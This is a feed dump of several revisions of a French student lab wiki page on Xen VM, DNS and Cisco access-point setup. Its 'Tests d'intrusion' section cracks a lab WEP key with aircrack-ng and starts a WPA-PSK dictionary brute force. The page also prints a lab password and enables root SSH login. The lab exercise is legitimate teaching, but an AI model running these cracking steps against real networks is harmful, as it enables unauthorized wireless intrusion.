Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56397</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56397"/>
				<updated>2021-11-19T09:39:40Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation : ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56396</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56396"/>
				<updated>2021-11-19T09:38:44Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation : ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
